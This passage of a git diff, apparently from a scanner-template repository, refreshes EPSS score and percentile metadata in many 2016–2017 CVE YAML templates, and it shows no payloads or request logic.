+21,7 @@ info: cve-id: CVE-2016-5649 cwe-id: CWE-319,CWE-200 epss-score: 0.75112 - epss-percentile: 0.98831 + epss-percentile: 0.98829 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 6ce2ea67ba9..81f75c6e706 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.8643 - epss-percentile: 0.99385 + epss-percentile: 0.99387 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index c312eac3aee..7ddb57248a1 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-6277 cwe-id: CWE-352 epss-score: 0.93986 - epss-percentile: 0.99882 + epss-percentile: 0.99881 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-9299.yaml b/http/cves/2016/CVE-2016-9299.yaml index 9fa187da0e0..b2aa7e2883f 100644 --- a/http/cves/2016/CVE-2016-9299.yaml +++ b/http/cves/2016/CVE-2016-9299.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-9299 cwe-id: CWE-90 epss-score: 0.86028 - epss-percentile: 0.99367 + epss-percentile: 0.99369 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 43e0e647633..e61438b8ae2 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.92743 - epss-percentile: 0.99743 + epss-percentile: 0.99742 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index e6be085264c..55d59ea064d 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-1000163 cwe-id: CWE-601 epss-score: 0.00827 - epss-percentile: 0.74007 + epss-percentile: 0.73983 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 2b556e0159e..f786882239b 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-1000486 cwe-id: CWE-326 epss-score: 0.94042 - epss-percentile: 0.99893 + epss-percentile: 0.99891 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index ebb8dc9d917..539d1694960 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-10974 cwe-id: CWE-22 epss-score: 0.89548 - epss-percentile: 0.99533 + epss-percentile: 0.99535 cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11107.yaml b/http/cves/2017/CVE-2017-11107.yaml index f01ebe3928c..ee40c10e061 100644 --- a/http/cves/2017/CVE-2017-11107.yaml +++ b/http/cves/2017/CVE-2017-11107.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-11107 - epss-score: 0.00193 - epss-percentile: 0.41312 + epss-score: 0.00063 + epss-percentile: 0.19797 cwe-id: CWE-79 cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 07cda5ad01a..5ee44835578 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.91455 - epss-percentile: 0.99646 + epss-percentile: 0.99645 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 7838558c4bc..b39dd0d5570 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.74991 - epss-percentile: 0.98827 + epss-percentile: 0.98825 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 9a9ee8e9881..3ff2c27ef5e 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.06568 - epss-percentile: 0.90871 + epss-percentile: 0.9087 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 7af23c6c4f2..d6cd07e2e76 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2017-11629 cwe-id: CWE-79 - epss-score: 0.00588 - epss-percentile: 0.68532 + epss-score: 0.00436 + epss-percentile: 0.62489 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 27791c13b81..56daad6de54 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.20503 - epss-percentile: 0.95368 + epss-percentile: 0.95369 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 4cf4a4452a8..ad397c1e767 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.01334 - epss-percentile: 0.7956 + epss-percentile: 0.79554 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index be306ece7bf..c06b3eb26c9 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -22,7 +22,7 @@ info: cve-id: "CVE-2017-12617" cwe-id: CWE-434 epss-score: 0.94356 - epss-percentile: 0.99957 + epss-percentile: 0.99958 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index f5acfedfd27..376d5d90ad4 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.93219 - epss-percentile: 0.99787 + epss-percentile: 0.99786 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index fb6631abf2e..b7aa3df54d8 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.17361 - epss-percentile: 0.9484 + epss-percentile: 0.94839 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index a59306c7e1a..bada6957704 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.91421 - epss-percentile: 0.99643 + epss-percentile: 0.99642 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index a928355916c..ae66a70e270 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.05987 - epss-percentile: 0.90395 + epss-percentile: 0.90397 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 0a59bcc56c2..fad5c8daa99 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.01358 - epss-percentile: 0.79745 + epss-percentile: 0.79736 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index b43a8c5b405..1682e679b3e 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.07641 - epss-percentile: 0.91615 + epss-percentile: 0.91614 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14725.yaml b/http/cves/2017/CVE-2017-14725.yaml index 20096e34ea9..bd4b9d2d33a 100644 --- a/http/cves/2017/CVE-2017-14725.yaml +++ b/http/cves/2017/CVE-2017-14725.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14725 cwe-id: CWE-601 epss-score: 0.02353 - epss-percentile: 0.84497 + epss-percentile: 0.84495 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14942.yaml b/http/cves/2017/CVE-2017-14942.yaml index 85a88cf3101..1d2a67fd5b4 100644 --- a/http/cves/2017/CVE-2017-14942.yaml +++ b/http/cves/2017/CVE-2017-14942.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14942 cwe-id: CWE-552 epss-score: 0.01009 - epss-percentile: 0.76616 + epss-percentile: 0.7661 cpe: cpe:2.3:h:intelbras:wrn150:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index eb325375039..a16076ae70f 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.03021 - epss-percentile: 0.8623 + epss-percentile: 0.86232 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index abb01ec0ee0..cc5b8fc64b5 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.61008 - epss-percentile: 0.98236 + epss-percentile: 0.98235 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 5136fd7aab5..9195ea4839a 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15715 cwe-id: CWE-20 epss-score: 0.94023 - epss-percentile: 0.9989 + epss-percentile: 0.99889 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 6bb29b8fc4b..87d6c4326d5 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-17059 cwe-id: CWE-79 epss-score: 0.00709 - epss-percentile: 0.71724 + epss-percentile: 0.717 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-17092.yaml b/http/cves/2017/CVE-2017-17092.yaml index c5f6df6b59a..2406cea5d6c 100644 --- a/http/cves/2017/CVE-2017-17092.yaml +++ b/http/cves/2017/CVE-2017-17092.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-17092 cwe-id: CWE-79 epss-score: 0.03307 - epss-percentile: 0.86888 + epss-percentile: 0.8689 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index fbf2cffd3f1..e0eced94c47 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.13674 - epss-percentile: 0.94047 + epss-percentile: 0.94043 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-17762.yaml b/http/cves/2017/CVE-2017-17762.yaml index f4547c3fcc7..aad69cb865a 100644 --- a/http/cves/2017/CVE-2017-17762.yaml +++ b/http/cves/2017/CVE-2017-17762.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-17762 cwe-id: CWE-611 - epss-score: 0.14323 - epss-percentile: 0.94201 + epss-score: 0.10472 + epss-percentile: 0.93015 cpe: cpe:2.3:a:episerver:episerver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index bb3e583fec8..a458e0e4413 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.07772 - epss-percentile: 0.91692 + epss-percentile: 0.9169 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18349.yaml b/http/cves/2017/CVE-2017-18349.yaml index 5ad902bdb18..579354cfecb 100644 --- a/http/cves/2017/CVE-2017-18349.yaml +++ b/http/cves/2017/CVE-2017-18349.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-18349 cwe-id: CWE-20 - epss-score: 0.92079 - epss-percentile: 0.99691 + epss-score: 0.90832 + epss-percentile: 0.99605 cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18362.yaml b/http/cves/2017/CVE-2017-18362.yaml index 9ad2e0bae13..d213003e2ac 100644 --- a/http/cves/2017/CVE-2017-18362.yaml +++ b/http/cves/2017/CVE-2017-18362.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-18362 cwe-id: CWE-89 epss-score: 0.87164 - epss-percentile: 0.99421 + epss-percentile: 0.99423 cpe: cpe:2.3:a:connectwise:manageditsync:*:*:*:*:*:kaseya_vsa:*:* metadata: vendor: connectwise diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 32f7db7ada9..8e59cd1d082 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18487 cwe-id: CWE-79 epss-score: 0.0048 - epss-percentile: 0.64504 + epss-percentile: 0.64492 cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index d05b6e07233..686cfd0c1e0 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.29095 + epss-percentile: 0.29044 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index c9fb40ea522..8cedd28a38c 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.29095 + epss-percentile: 0.29044 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index ba4e935e44e..dfe8ad4e8ea 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.29095 + epss-percentile: 0.29044 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 58280466c0a..092b0ab2973 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.29164 + epss-percentile: 0.29113 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 6c266027223..3e735cbc176 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.29164 + epss-percentile: 0.29113 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 6e5d284d0ad..0fae32ad875 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.29164 + epss-percentile: 0.29113 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 5faa023fda3..a9291c87ad1 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00385 - epss-percentile: 0.59222 + epss-percentile: 0.59217 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 37ae658ca75..e39fb9a1cea 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00385 - epss-percentile: 0.59222 + epss-percentile: 0.59217 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index ce548d26303..3abd9a68e46 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00314 - epss-percentile: 0.5408 + epss-percentile: 0.54072 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 0969640d64a..09da8859846 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.02615 - epss-percentile: 0.85254 + epss-percentile: 0.8525 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 535b96b62fa..fb46d93a372 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00059 - epss-percentile: 0.18655 + epss-percentile: 0.18591 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index c05497b761e..4e62324fbd2 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00059 - epss-percentile: 0.18655 + epss-percentile: 0.18591 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index ebb0adb1237..2a3eece9219 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00059 - epss-percentile: 0.18655 + epss-percentile: 0.18591 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 152b5a6e100..f6af0fbbab6 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00059 - epss-percentile: 0.18655 + epss-percentile: 0.18591 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index d8dc474c1cf..b635b2b12d6 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00056 - epss-percentile: 0.17693 + epss-percentile: 0.17634 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 238d94cfc27..2eedeb218f0 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00059 - epss-percentile: 0.18655 + epss-percentile: 0.18591 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index a09d1963530..9b189b36503 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.2765 + epss-percentile: 0.27598 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index a77a536e1c2..5af50e75b2a 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.2765 + epss-percentile: 0.27598 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 20cd000a96f..e7020743b33 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.05223 - epss-percentile: 0.89639 + epss-percentile: 0.89635 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 8ed207fe138..fe1e9ec1fe1 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00059 - epss-percentile: 0.18655 + epss-percentile: 0.18591 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 5661719d0b1..99ceccc8539 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00089 - epss-percentile: 0.25879 + epss-percentile: 0.25829 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 712a11ea1a5..12a15210525 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.2765 + epss-percentile: 0.27598 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index a2716b2de6f..37d4d30a1e4 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -20,7 +20,7 @@ info: 